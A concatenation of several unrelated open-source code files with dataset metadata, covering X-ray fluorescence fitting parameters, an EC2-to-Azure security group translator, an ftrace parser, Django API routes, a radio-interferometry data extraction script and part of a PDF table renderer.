# HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, #
# STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OTHERWISE) ARISING #
# IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE #
# POSSIBILITY OF SUCH DAMAGE. #
########################################################################
__author__ = 'Li Li'
import numpy as np
import six
import json
from collections import OrderedDict
import copy
import os
from atom.api import (Atom, Str, observe, Typed,
Int, Dict, List, Float, Enum, Bool)
from skxray.fitting.background import snip_method
from skxray.constants.api import XrfElement as Element
from skxray.fitting.xrf_model import (ModelSpectrum, ParamController,
trim, construct_linear_model, linear_spectrum_fitting)
#from pyxrf.model.fit_spectrum import fit_strategy_list
import logging
logger = logging.getLogger(__name__)
bound_options = ['none', 'lohi', 'fixed', 'lo', 'hi']
fit_strategy_list = ['fit_with_tail', 'free_more',
'e_calibration', 'linear',
'adjust_element1', 'adjust_element2', 'adjust_element3']
class Parameter(Atom):
# todo make sure that these are the only valid bound types
bound_type = Enum(*bound_options)
min = Float(-np.inf)
max = Float(np.inf)
value = Float()
default_value = Float()
fit_with_tail = Enum(*bound_options)
free_more = Enum(*bound_options)
adjust_element1 = Enum(*bound_options)
adjust_element2 = Enum(*bound_options)
adjust_element3 = Enum(*bound_options)
e_calibration = Enum(*bound_options)
linear = Enum(*bound_options)
name = Str()
description = Str()
tool_tip = Str()
@observe('name', 'bound_type', 'min', 'max', 'value', 'default_value')
def update_displayed_name(self, changed):
pass
# print(changed)
def __repr__(self):
return ("Parameter(bound_type={}, min={}, max={}, value={}, "
"default={}, free_more={}, adjust_element1={}, "
"adjust_element2={}, adjust_element3={}, "
"e_calibration={}, linear={}, description={}, "
"toop_tip={}".format(
self.bound_type, self.min, self.max, self.value, self.default_value,
self.free_more, self.adjust_element1, self.adjust_element2,
self.adjust_element3, self.e_calibration,
self.linear, self.description, self.tool_tip))
def to_dict(self):
return {
'bound_type': self.bound_type,
'min': self.min,
'max': self.max,
'value': self.value,
'default_value': self.default_value,
'fit_with_tail': self.fit_with_tail,
'free_more': self.free_more,
'adjust_element1': self.adjust_element1,
'adjust_element2': self.adjust_element2,
'adjust_element3': self.adjust_element3,
'e_calibration': self.e_calibration,
'linear': self.linear,
'name': self.name,
'description': self.description,
'tool_tip': self.tool_tip,
}
def format_dict(parameter_object_dict, element_list):
"""
Format the dictionary that scikit-xray expects.
Parameters
----------
parameter_object_dict : dict
element_list : list
Need to be transferred to str first, then save it to dict
"""
param_dict = {key: value.to_dict() for key, value
in six.iteritems(parameter_object_dict)}
elo = param_dict.pop('energy_bound_low')['value']
ehi = param_dict.pop('energy_bound_high')['value']
non_fitting_values = {'non_fitting_values': {
'energy_bound_low': elo,
'energy_bound_high': ehi,
'element_list': ', '.join(element_list)
}}
param_dict.update(non_fitting_values)
return param_dict
def dict_to_param(param_dict):
"""
Transfer param dict to parameter object.
Parameters
param_dict : dict
fitting parameter
"""
temp_parameters = copy.deepcopy(param_dict)
non_fitting_values = temp_parameters.pop('non_fitting_values')
element_list = non_fitting_values.pop('element_list')
if not isinstance(element_list, list):
element_list = [e.strip(' ') for e in element_list.split(',')]
#self.element_list = element_list
elo = non_fitting_values.pop('energy_bound_low')
ehi = non_fitting_values.pop('energy_bound_high')
param = {
'energy_bound_low': Parameter(value=elo,
default_value=elo,
description='E low limit [keV]'),
'energy_bound_high': Parameter(value=ehi,
default_value=ehi,
description='E high limit [keV]')
}
for param_name, param_dict in six.iteritems(temp_parameters):
if 'default_value' in param_dict:
param.update({param_name: Parameter(**param_dict)})
else:
param.update({
param_name: Parameter(default_value=param_dict['value'],
**param_dict)
})
return element_list, param
class PreFitStatus(Atom):
"""
Data structure for pre fit analysis.
Attributes
----------
z : str
z number of element
spectrum : array
spectrum of given element
status : bool
True as plot is visible
stat_copy : bool
copy of status
maxv : float
max value of a spectrum
norm : float
norm value respect to the strongest peak
lbd_stat : bool
define plotting status under a threshold value
"""
z = Str()
energy = Str()
spectrum = Typed(np.ndarray)
status = Bool(False)
stat_copy = Bool(False)
maxv = Float()
norm = Float()
lbd_stat = Bool(False)
class ElementController(object):
"""
This class performs basic ways to rank elements, show elements,
calculate normed intensity, and etc.
"""
def __init__(self):
self.element_dict = OrderedDict()
def delete_item(self, k):
try:
del self.element_dict[k]
self.update_norm()
logger.info('Item {} is deleted.'.format(k))
except KeyError, e:
logger.info(e)
def order(self, option='z'):
"""
Order dict in different ways.
"""
if option == 'z':
self.element_dict = OrderedDict(sorted(six.iteritems(self.element_dict),
key=lambda t: t[1].z))
elif option == 'energy':
self.element_dict = OrderedDict(sorted(six.iteritems(self.element_dict),
key=lambda t: t[1].energy))
elif option == 'name':
self.element_dict = OrderedDict(sorted(six.iteritems(self.element_dict),
key=lambda t: t[0]))
elif option == 'maxv':
self.element_dict = OrderedDict(sorted(six.iteritems(self.element_dict),
key=lambda t: t[1].maxv, reverse=True))
def add_to_dict(self, dictv):
self.element_dict.update(dictv)
self.update_norm()
def update_norm(self, threshv=0.1):
"""
Calculate the norm intensity for each element peak.
Parameters
----------
threshv : float
No value is shown when smaller than the shreshold value
"""
#max_dict = reduce(max, map(np.max, six.itervalues(self.element_dict)))
max_dict = np.max(np.array([v.maxv for v in six.itervalues(self.element_dict)]))
for v in six.itervalues(self.element_dict):
v.norm = v.maxv/max_dict*100
v.lbd_stat = bool(v.norm > threshv)
def delete_all(self):
self.element_dict.clear()
def get_element_list(self):
current_elements = [v for v in six.iterkeys(self.element_dict) if v.lower() != v]
logger.info('Current Elements for fitting are {}'.format(current_elements))
return current_elements
def update_peak_ratio(self):
"""
In case users change the max value.
"""
for v in six.itervalues(self.element_dict):
v.maxv = np.around(v.maxv, 1)
v.spectrum = v.spectrum*v.maxv/np.max(v.spectrum)
self.update_norm()
def turn_on_all(self, option=True):
"""
Set plotting status on for all lines.
"""
if option:
_plot = option
else:
_plot = False
for v in six.itervalues(self.element_dict):
v.status = _plot
class GuessParamModel(Atom):
"""
This is auto fit model to guess the initial parameters.
Attributes
----------
parameters : `atom.Dict`
A list of `Parameter` objects, subclassed from the `Atom` base class.
These `Parameter` objects hold all relevant xrf information.
data : array
1D array of spectrum
prefit_x : array
xX axis with range defined by low and high limits.
result_dict : dict
Save all the auto fitting results for each element.
It is a dictionary of object PreFitStatus.
param_d : dict
Parameters can be transferred into this dictionary.
param_new : dict
More information are saved, such as element position and width.
total_y : dict
Results from k lines
total_y_l : dict
Results from l lines
total_y_m : dict
Results from l lines
e_list : str
All elements used for fitting.
file_path : str
The path where file is saved.
element_list : list
"""
default_parameters = Dict()
#parameters = Dict() #Typed(OrderedDict) #OrderedDict()
data = Typed(object)
prefit_x = Typed(object)
result_dict = Typed(object) #Typed(OrderedDict)
result_dict_names = List()
#param_d = Dict()
param_new = Dict()
total_y = Dict()
total_y_l = Dict()
total_y_m = Dict()
e_name = Str()
add_element_intensity = Float()
#save_file = Str()
result_folder = Str()
#file_path = Str()
element_list = List()
data_sets = Typed(OrderedDict)
file_opt = Int()
data_all = Typed(np.ndarray)
EC = Typed(object)
def __init__(self, *args, **kwargs):
try:
self.default_parameters = kwargs['default_parameters']
#self.element_list, self.parameters = dict_to_param(self.default_parameters)
self.param_new = copy.deepcopy(self.default_parameters)
self.element_list = get_element(self.param_new)
#self.get_param(default_parameters)
except ValueError:
logger.info('No default parameter files are chosen.')
self.result_folder = kwargs['working_directory']
self.EC = ElementController()
def get_new_param(self, param_path):
"""
Update parameters if new param_path is given.
Parameters
----------
param_path : str
path to save the file
"""
with open(param_path, 'r') as json_data:
self.param_new = json.load(json_data)
#self.element_list, self.parameters = dict_to_param(self.param_new)
self.element_list = get_element(self.param_new)
self.EC.delete_all()
self.create_spectrum_from_file(self.param_new, self.element_list)
logger.info('Elements read from file are: {}'.format(self.element_list))
#self.element_list, self.parameters = self.get_param(new_param)
def create_spectrum_from_file(self, param_dict, elemental_lines):
"""
Create spectrum profile with given param dict from file.
Parameters
----------
param_dict : dict
dict obtained from file
elemental_lines : list
e.g., ['Na_K', Mg_K', 'Pt_M'] refers to the
K lines of Sodium, the K lines of Magnesium, and the M
lines of Platinum
"""
self.prefit_x, pre_dict = calculate_profile(self.data,
param_dict, elemental_lines)
#factor_to_area = factor_height2area()
temp_dict = OrderedDict()
for e in six.iterkeys(pre_dict):
ename = e.split('_')[0]
for k, v in six.iteritems(param_dict):
if ename in k and 'area' in k:
energy = float(get_energy(e))
factor_to_area = factor_height2area(energy, self.param_new)
ratio = v['value']/factor_to_area
spectrum = pre_dict[e] #/ np.max(pre_dict[e]) * ratio
elif ename == 'compton' and k == 'compton_amplitude':
# the rest-mass energy of an electron (511 keV)
mc2 = 511
comp_denom = (1 + self.param_new['coherent_sct_energy']['value']
/ mc2 * (1 - np.cos(np.deg2rad(self.param_new['compton_angle']['value']))))
compton_energy = self.param_new['coherent_sct_energy']['value'] / comp_denom
factor_to_area = factor_height2area(compton_energy, self.param_new,
std_correction=self.param_new['compton_fwhm_corr']['value'])
spectrum = pre_dict[e] #/ np.max(pre_dict[e]) * ratio
elif ename == 'elastic' and k == 'coherent_sct_amplitude':
factor_to_area = factor_height2area(self.param_new['coherent_sct_energy']['value'],
self.param_new)
ratio = v['value']/factor_to_area
spectrum = pre_dict[e] #/ np.max(pre_dict[e]) * ratio
elif ename == 'background':
spectrum = pre_dict[e]
else:
continue
ps = PreFitStatus(z=get_Z(ename), energy=get_energy(e), spectrum=spectrum,
maxv=np.around(np.max(spectrum), 1),
norm=-1, lbd_stat=False)
temp_dict.update({e: ps})
self.EC.add_to_dict(temp_dict)
@observe('file_opt')
def choose_file(self, change):
if self.file_opt == 0:
return
names = self.data_sets.keys()
self.data = self.data_sets[names[self.file_opt-1]].get_sum()
self.data_all = self.data_sets[names[self.file_opt-1]].raw_data
def manual_input(self):
default_area = 1e5
logger.info('Element {} is added'.format(self.e_name))
#param_dict = format_dict(self.parameters, self.element_list)
x, data_out = calculate_profile(self.data, self.param_new,
elemental_lines=[self.e_name], default_area=default_area)
ps = PreFitStatus(z=get_Z(self.e_name), energy=get_energy(self.e_name),
spectrum=data_out[self.e_name]/np.max(data_out[self.e_name])*self.add_element_intensity,
maxv=self.add_element_intensity, norm=-1,
lbd_stat=False)
self.EC.add_to_dict({self.e_name: ps})
def update_name_list(self):
"""
When result_dict_names change, the looper in enaml will update.
"""
# need to clean list first, in order to refresh the list in GUI
self.result_dict_names = []
self.result_dict_names = self.EC.element_dict.keys()
logger.info('Current element names are {}'.format(self.result_dict_names))
def find_peak(self, threshv=0.1):
"""
Run automatic peak finding, and save results as dict of object.
"""
#param_dict = format_dict(self.parameters, self.element_list)
self.prefit_x, out_dict = linear_spectrum_fitting(self.data,
self.param_new)
logger.info('Energy range: {}, {}'.format(self.param_new['non_fitting_values']['energy_bound_low']['value'],
self.param_new['non_fitting_values']['energy_bound_high']['value']))
#max_dict = reduce(max, map(np.max, six.itervalues(out_dict)))
prefit_dict = OrderedDict()
for k, v in six.iteritems(out_dict):
ps = PreFitStatus(z=get_Z(k), energy=get_energy(k), spectrum=v,
maxv=np.around(np.max(v), 1), norm=-1,
lbd_stat=False)
prefit_dict.update({k: ps})
logger.info('The elements from parameter guess: {}'.format(
prefit_dict.keys()))
self.EC.add_to_dict(prefit_dict)
def create_full_param(self, peak_std=0.07):
"""
Extend the param to full param dict with detailed elements
information, and assign initial values from pre fit.
Parameters
----------
peak_std : float
approximated std for element peak.
"""
self.element_list = self.EC.get_element_list()
self.param_new['non_fitting_values']['element_list'] = ', '.join(self.element_list)
#param_d = format_dict(self.parameters, self.element_list)
self.param_new = param_dict_cleaner(self.param_new, self.element_list)
print('element list before register: {}'.format(self.element_list))
# create full parameter list including elements
PC = ParamController(self.param_new, self.element_list)
#PC.create_full_param()
self.param_new = PC.params
# to create full param dict, for GUI only
create_full_dict(self.param_new, fit_strategy_list)
logger.info('full dict: {}'.format(self.param_new.keys()))
logger.info('incident energy: {}'.format(self.param_new['coherent_sct_energy']['value']))
# update according to pre fit results
if len(self.EC.element_dict):
for e in self.element_list:
zname = e.split('_')[0]
for k, v in six.iteritems(self.param_new):
if zname in k and 'area' in k:
factor_to_area = factor_height2area(float(self.EC.element_dict[e].energy),
self.param_new)
v['value'] = self.EC.element_dict[e].maxv * factor_to_area
if 'compton' in self.EC.element_dict:
gauss_factor = 1/(1 + self.param_new['compton_f_step']['value']
+ self.param_new['compton_f_tail']['value']
+ self.param_new['compton_hi_f_tail']['value'])
# the rest-mass energy of an electron (511 keV)
mc2 = 511
comp_denom = (1 + self.param_new['coherent_sct_energy']['value']
/ mc2 * (1 - np.cos(np.deg2rad(self.param_new['compton_angle']['value']))))
compton_energy = self.param_new['coherent_sct_energy']['value'] / comp_denom
factor_to_area = factor_height2area(compton_energy, self.param_new,
std_correction=self.param_new['compton_fwhm_corr']['value'])
self.param_new['compton_amplitude']['value'] = \
self.EC.element_dict['compton'].maxv * factor_to_area
if 'coherent_sct_amplitude' in self.EC.element_dict:
self.param_new['coherent_sct_amplitude']['value'] = np.sum(
self.EC.element_dict['elastic'].spectrum)
def data_for_plot(self):
"""
Save data in terms of K, L, M lines for plot.
"""
self.total_y = {}
self.total_y_l = {}
self.total_y_m = {}
new_dict = {k: v for (k, v) in six.iteritems(self.EC.element_dict) if v.status}
for k, v in six.iteritems(new_dict):
if 'K' in k:
self.total_y[k] = self.EC.element_dict[k].spectrum
elif 'L' in k:
self.total_y_l[k] = self.EC.element_dict[k].spectrum
elif 'M' in k:
self.total_y_m[k] = self.EC.element_dict[k].spectrum
else:
self.total_y[k] = self.EC.element_dict[k].spectrum
def save(self, fname='param_default1.json'):
"""
Save full param dict into a file at result directory.
The name of the file is predefined.
Parameters
----------
fname : str, optional
file name to save updated parameters
"""
fpath = os.path.join(self.result_folder, fname)
with open(fpath, 'w') as outfile:
json.dump(self.param_new, outfile,
sort_keys=True, indent=4)
def read_pre_saved(self, fname='param_default1.json'):
"""This is a bad idea."""
fpath = os.path.join(self.result_folder, fname)
with open(fpath, 'r') as infile:
data = json.load(infile)
return data
def save_as(file_path, data):
"""
Save full param dict into a file.
"""
with open(file_path, 'w') as outfile:
json.dump(data, outfile,
sort_keys=True, indent=4)
def calculate_profile(y0, param,
elemental_lines, default_area=1e5):
# Need to use deepcopy here to avoid unexpected change on parameter dict
fitting_parameters = copy.deepcopy(param)
x0 = np.arange(len(y0))
# ratio to transfer energy value back to channel value
approx_ratio = 100
lowv = fitting_parameters['non_fitting_values']['energy_bound_low']['value'] * approx_ratio
highv = fitting_parameters['non_fitting_values']['energy_bound_high']['value'] * approx_ratio
x, y = trim(x0, y0, lowv, highv)
e_select, matv = construct_linear_model(x, fitting_parameters,
elemental_lines,
default_area=default_area)
non_element = ['compton', 'elastic']
total_list = e_select + non_element
total_list = [str(v) for v in total_list]
temp_d = {k: v for (k, v) in zip(total_list, matv.transpose())}
# get background
bg = snip_method(y, fitting_parameters['e_offset']['value'],
fitting_parameters['e_linear']['value'],
fitting_parameters['e_quadratic']['value'])
temp_d.update(background=bg)
#for i in len(total_list):
# temp_d[total_list[i]] = matv[:, i]
x = (fitting_parameters['e_offset']['value']
+ fitting_parameters['e_linear']['value'] * x
+ fitting_parameters['e_quadratic']['value'] * x**2)
return x, temp_d
def create_full_dict(param, name_list):
"""
Create full param dict so each item has same nested dict.
This is for GUI purpose only.
.. warning :: This function mutates the input values.
Pamameters
----------
param : dict
all parameters including element
name_list : list
strategy names
"""
for n in name_list:
for k, v in six.iteritems(param):
if k == 'non_fitting_values':
continue
if n not in v:
v.update({n: v['bound_type']})
def get_Z(ename):
"""
Return element's Z number.
Parameters
----------
ename : str
element name
Returns
-------
int or None
element Z number
"""
strip_line = lambda ename: ename.split('_')[0]
non_element = ['compton', 'elastic', 'background']
if ename in non_element:
return '-'
else:
e = Element(strip_line(ename))
return str(e.Z)
def get_energy(ename):
strip_line = lambda ename: ename.split('_')[0]
non_element = ['compton', 'elastic', 'background']
if ename in non_element:
return '-'
else:
e = Element(strip_line(ename))
if '_K' in ename:
energy = e.emission_line['ka1']
elif '_L' in ename:
energy = e.emission_line['la1']
elif '_M' in ename:
energy = e.emission_line['ma1']
return str(np.around(energy, 4))
def get_element(param):
element_list = param['non_fitting_values']['element_list']
return [e.strip(' ') for e in element_list.split(',')]
def factor_height2area(energy, param, std_correction=1):
"""
Factor to transfer peak height to area.
"""
temp_val = 2 * np.sqrt(2 * np.log(2))
epsilon = param['non_fitting_values']['electron_hole_energy']
sigma = np.sqrt((param['fwhm_offset']['value'] / temp_val)**2
+ energy * epsilon * param['fwhm_fanoprime']['value'])
return sigma*std_correction
def param_dict_cleaner(param, element_list):
"""
Make sure param only contains element from element_list.
Parameters
----------
param : dict
fitting parameters
element_list : list
list of elemental lines
Returns
-------
dict :
new param dict containing given elements
"""
param_new = {}
for k, v in six.iteritems(param):
if k == 'non_fitting_values' or k == k.lower():
param_new.update({k: v})
else:
if k[:2] in element_list:
param_new.update({k: v})
return param_new | bsd-3-clause | -2,165,580,146,740,394,200 | 36.340541 | 118 | 0.551446 | false |
aznashwan/heat2arm | heat2arm/translators/networking/secgroups/ec2_secgroup.py | 1 | 3254 | # Copyright 2015 Cloudbase Solutions Srl
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Contains the definition for the EC2 security group translator.
"""
from heat2arm.translators.networking.secgroups.base_secgroup import (
BaseSecurityGroupARMTranslator
)
class EC2SecurityGroupARMTranslator(BaseSecurityGroupARMTranslator):
""" EC2SecurityGroupARMTranslator is the translator
for EC2 security groups.
"""
heat_resource_type = "AWS::EC2::SecurityGroup"
def _get_rules(self):
""" _get_rules is a helper method which returns a list of all
the resulting ARM security group rules to be created.
"""
i = 0
rules = []
# traverse all ingress rules; if any:
if "SecurityGroupIngress" in self._heat_resource.properties.data:
for in_rule in self._heat_resource.properties.data[
"SecurityGroupIngress"]:
# build the rule:
rule = {
"name": "%s_rule_%d" % (self._name, i),
"properties": {
"protocol": in_rule["IpProtocol"],
"sourcePortRange": in_rule["FromPort"],
"destinationPortRange": in_rule["ToPort"],
"sourceAddressPrefix": in_rule["CidrIp"],
"destinationAddressPrefix": "*",
"direction": "Inbound",
"access": "Allow",
# NOTE: priority is always fixed.
"priority": 100 + i,
}
}
i = i + 1
rules.append(rule)
# traverse all egress rules; if any:
if "SecurityGroupEgress" in self._heat_resource.properties.data:
for out_rule in self._heat_resource.properties.data[
"SecurityGroupEgress"]:
# build the rule:
rule = {
"name": "%s_rule_%d" % (self._name, i),
"properties": {
"protocol": out_rule["IpProtocol"],
"sourcePortRange": out_rule["FromPort"],
"destinationPortRange": out_rule["ToPort"],
"sourceAddressPrefix": out_rule["CidrIp"],
"destinationAddressPrefix": "*",
"direction": "Outbound",
"access": "Allow",
# NOTE: priority is always fixed.
"priority": 100 + i,
}
}
i = i + 1
rules.append(rule)
return rules
| apache-2.0 | -445,866,815,154,035,600 | 37.738095 | 78 | 0.527966 | false |
corakwue/ftrace | ftrace/parsers/sched_load_avg_cpu.py | 1 | 2005 | #!/usr/bin/python
# Copyright 2015 Huawei Devices USA Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
# Authors:
# Chuk Orakwue <[email protected]>
import re
from ftrace.common import ParserError
from .register import register_parser
try:
from ftrace.third_party.cnamedtuple import namedtuple
except ImportError:
from collections import namedtuple
TRACEPOINT = 'sched_load_avg_cpu'
__all__ = [TRACEPOINT]
SchedLoadAvgCpuBase = namedtuple(TRACEPOINT,
[
'cpu'
'load_avg',
'util_avg'
]
)
class SchedLoadAvgCpu(SchedLoadAvgCpuBase):
__slots__ = ()
def __new__(cls, cpu, load_avg, util_avg):
cpu = int(cpu)
load_avg = int(load_avg)
util_avg = int(util_avg)
return super(cls, SchedLoadAvgCpu).__new__(
cls,
cpu=cpu,
load_avg=load_avg,
util_avg=util_avg,
)
sched_load_avg_cpu_pattern = re.compile(
r"""
cpu=(?P<cpu>\d+)\s+
load_avg=(?P<load_avg>\d+)\s+
util_avg=(?P<util_avg>\d+)
""",
re.X|re.M
)
@register_parser
def sched_load_avg_cpu(payload):
"""Parser for `sched_load_avg_cpu` tracepoint"""
try:
match = re.match(sched_load_avg_cpu_pattern, payload)
if match:
match_group_dict = match.groupdict()
return SchedLoadAvgCpu(**match_group_dict)
except Exception, e:
raise ParserError(e.message)
| apache-2.0 | 1,968,760,944,318,342,700 | 26.094595 | 74 | 0.632918 | false |
grepme/cmput410-project | api/urls.py | 1 | 1779 | from django.conf.urls import patterns, include, url
guid_regex = "[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}"
sha1_regex = "[a-zA-Z0-9]+"
id_regex = "(({guid})|({sha1}))".format(guid=guid_regex,sha1=sha1_regex)
urlpatterns = patterns('api.views',
# get posts by a specific author that the current authenticated user
# can view
# author/id1/posts
# /api/author/ef3e0e05-c5f8-11e4-a972-b8f6b116b2b7/posts/
(r'^author/(?:(?P<author_id>{})/?)?posts/?(?:/(?P<page>\d*)/?)?$'.format(id_regex), 'get_posts'),
# Get a specific post or all public posts
(r'^posts/?(?:(?P<post_id>{}))?/?$'.format(id_regex), 'get_post'),
#See if a author_id is a friend with author_2_id
(r'^friends/(?P<author_id>{0})/(?P<author_2_id>{0})/?$'.format(id_regex), 'is_friend'),
# POST authors, returns list of friends in the list
(r'^friends/(?P<author_id>{})/?$'.format(id_regex), 'get_friends'),
# GET authors on our server
(r'^author$', 'get_authors'),
# GET author on our server
(r'^author/(?P<profile_id>{})/?$'.format(id_regex), 'get_author'),
# Make a friend request with another user
(r'^friendrequest$', 'friend_request'),
# Follow a specific user
(r'^follow$', 'follow_user'),
# search for a user
#(r'search/(?P<name>([a-zA-Z0-9 -._~:?#%]+))/?$', 'search_users'),
)
| apache-2.0 | -7,852,624,737,404,225,000 | 44.615385 | 121 | 0.45756 | false |
jspilker/visilens | examples/Ex1_get_data_continuum.py | 1 | 4773 | """
Example 1, to be run within CASA. This script serves as a guideline
for how to get data out of a CASA ms and into a format which
visilens can use. We really don't need all that much information,
so we keep only the columns we need.
To keep the number of visibilities low, we first average the data
a bit. In this particular case, the on-source integration times were
only ~60s, so we won't average in time. We will average down each of
the four ALMA basebands (spectral windows), since this is continuum
data and the fractional bandwidth from the lowest to highest observed
frequency is small. We'll also average the two orthogonal polarizations,
since the source is unpolarized. Last, for fitting, we need an
accurate estimate of the uncertainty on each visibility. The *relative*
uncertainties in the data are okay, but they're not on any absolute scale,
so we need to calculate what the re-scaling factor should be. To do this,
we take the difference between successive visibilities on each baseline
(these are strong sources, so unfortunately we can't just use the rms)
and re-scale the noise to match. In principle CASA's statwt also does
this, but I found that it sometimes gave bizarre results (some baselines
weighted 100x more than others for no obvious reason, etc.). If you
have better luck with it, feel free to use that instead!
"""
import numpy as np
import os
c = 299792458.0 # in m/s
# Path to the calibrated ms file, and the source name we want.
inms = 'Compact_0202_to_0418.cal.ms'
field = 'SPT0202-61'
spw = '0,1,2,3'
# First we split out just the source we want from our ms file.
outms = field+'_'+inms[:3].lower()+'.ms'
os.system('rm -rf '+outms)
split(inms,outms,field=field,spw=spw,width=128,datacolumn='corrected',
keepflags=False)
# Now we'll get the visibility columns we need, before manipulating them.
# data_desc_id is a proxy for the spw number.
ms.open(outms,nomodify=True)
visdata = ms.getdata(['uvw','antenna1','antenna2','data','sigma','data_desc_id'])
visdata['data'] = np.squeeze(visdata['data']) # ditch unnecessary extra dimension
ms.close()
# Get the frequencies associated with each spw, because uvw coordinates are in m
tb.open(outms+'/SPECTRAL_WINDOW')
freqs = np.squeeze(tb.getcol('CHAN_FREQ')) # center freq of each spw
tb.close()
# Get the primary beam size from the antenna diameter. Assumes homogeneous array,
# sorry CARMA users.
tb.open(outms+'/ANTENNA')
diam = np.squeeze(tb.getcol('DISH_DIAMETER'))[0]
PBfwhm = 1.2*(c/np.mean(freqs))/diam * (3600*180/np.pi) # in arcsec
tb.close()
# Data and sigma have both polarizations; average them
visdata['data'] = np.average(visdata['data'],weights=(visdata['sigma']**-2.),axis=0)
visdata['sigma']= np.sum((visdata['sigma']**-2.),axis=0)**-0.5
# Convert uvw coords from m to lambda
for ispw in range(len(spw.split(','))):
visdata['uvw'][:,visdata['data_desc_id']==ispw] *= freqs[ispw]/c
# Calculate the noise re-scaling, by differencing consecutive visibilities on the
# same baseline. Have to do an ugly double-loop here; would work better if we knew
# in advance how the data were ordered (eg time-sorted). We assume that we can
# re-scale the noise using the mean of the re-scalings from each baseline.
facs = []
for ant1 in np.unique(visdata['antenna1']):
for ant2 in np.unique(visdata['antenna2']):
if ant1 < ant2:
thisbase = (visdata['antenna1']==ant1) & (visdata['antenna2']==ant2)
reals = visdata['data'].real[thisbase]
imags = visdata['data'].imag[thisbase]
sigs = visdata['sigma'][thisbase]
diffrs = reals - np.roll(reals,-1); diffis = imags - np.roll(imags,-1)
std = np.mean([diffrs.std(),diffis.std()])
facs.append(std/sigs.mean()/np.sqrt(2))
facs = np.asarray(facs); visdata['sigma'] *= facs.mean()
print outms, '| mean rescaling factor: ',facs.mean(), '| rms/beam (mJy): ',1000*((visdata['sigma']**-2).sum())**-0.5
# If we ever want to mess with the data after re-scaling the weights, we have to
# write them back to the ms file. But, CASA doesn't like that we've averaged
# the polarizations together, so we have to keep them separate for this purpose.
ms.open(outms,nomodify=False)
replace = ms.getdata(['sigma','weight'])
replace['sigma'] *= facs.mean()
replace['weight'] = replace['sigma']**-2.
ms.putdata(replace)
ms.close()
# Create one single array of all this data, then save everything.
allarr = np.vstack((visdata['uvw'][0,:],visdata['uvw'][1,:],visdata['data'].real,
visdata['data'].imag,visdata['sigma'],visdata['antenna1'],visdata['antenna2']))
outfname = field+'_'+inms[:3].lower()+'.bin'
with open(outfname,'wb')as f:
allarr.tofile(f)
f.write(PBfwhm)
| mit | 5,476,157,098,352,860,000 | 44.457143 | 116 | 0.699979 | false |
bbondy/brianbondy.gae | libs/sx/pisa3/pisa_tables.py | 1 | 13877 | # -*- coding: ISO-8859-1 -*-
# Copyright 2010 Dirk Holtwick, holtwick.it
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
__reversion__ = "$Revision: 20 $"
__author__ = "$Author: holtwick $"
__date__ = "$Date: 2007-10-09 12:58:24 +0200 (Di, 09 Okt 2007) $"
from pisa_tags import pisaTag
from pisa_util import *
from pisa_reportlab import PmlTable, TableStyle, PmlKeepInFrame
import copy
import sys
import logging
log = logging.getLogger("ho.pisa")
def _width(value=None):
if value is None:
return None
value = str(value)
if value.endswith("%"):
return value
return getSize(value)
class TableData:
def __init__(self):
self.data = []
self.styles = []
self.span = []
self.mode = ""
self.padding = 0
self.col = 0
# self.c = None
def add_cell(self, data=None):
self.col += 1
self.data[len(self.data) - 1].append(data)
def add_style(self, data):
# print self.mode, data
# Do we have color and
# width = data[3]
#if data[0].startswith("LINE"):
# color = data[4]
# if color is None:
# return
self.styles.append(copy.copy(data))
def add_empty(self, x, y):
self.span.append((x, y))
def get_data(self):
data = self.data
for x, y in self.span:
try:
data[y].insert(x, '')
except:
pass
return data
def add_cell_styles(self, c, begin, end, mode="td"):
def getColor(a, b):
return a
self.mode = mode.upper()
if c.frag.backColor and mode != "tr": # XXX Stimmt das so?
self.add_style(('BACKGROUND', begin, end, c.frag.backColor))
# print 'BACKGROUND', begin, end, c.frag.backColor
if 0:
log.debug("%r", (
begin,
end,
c.frag.borderTopWidth,
c.frag.borderTopStyle,
c.frag.borderTopColor,
c.frag.borderBottomWidth,
c.frag.borderBottomStyle,
c.frag.borderBottomColor,
c.frag.borderLeftWidth,
c.frag.borderLeftStyle,
c.frag.borderLeftColor,
c.frag.borderRightWidth,
c.frag.borderRightStyle,
c.frag.borderRightColor,
))
if getBorderStyle(c.frag.borderTopStyle) and c.frag.borderTopWidth and c.frag.borderTopColor is not None:
self.add_style(('LINEABOVE', begin, (end[0], begin[1]),
c.frag.borderTopWidth,
c.frag.borderTopColor,
"squared"))
if getBorderStyle(c.frag.borderLeftStyle) and c.frag.borderLeftWidth and c.frag.borderLeftColor is not None:
self.add_style(('LINEBEFORE', begin, (begin[0], end[1]),
c.frag.borderLeftWidth,
c.frag.borderLeftColor,
"squared"))
if getBorderStyle(c.frag.borderRightStyle) and c.frag.borderRightWidth and c.frag.borderRightColor is not None:
self.add_style(('LINEAFTER', (end[0], begin[1]), end,
c.frag.borderRightWidth,
c.frag.borderRightColor,
"squared"))
if getBorderStyle(c.frag.borderBottomStyle) and c.frag.borderBottomWidth and c.frag.borderBottomColor is not None:
self.add_style(('LINEBELOW', (begin[0], end[1]), end,
c.frag.borderBottomWidth,
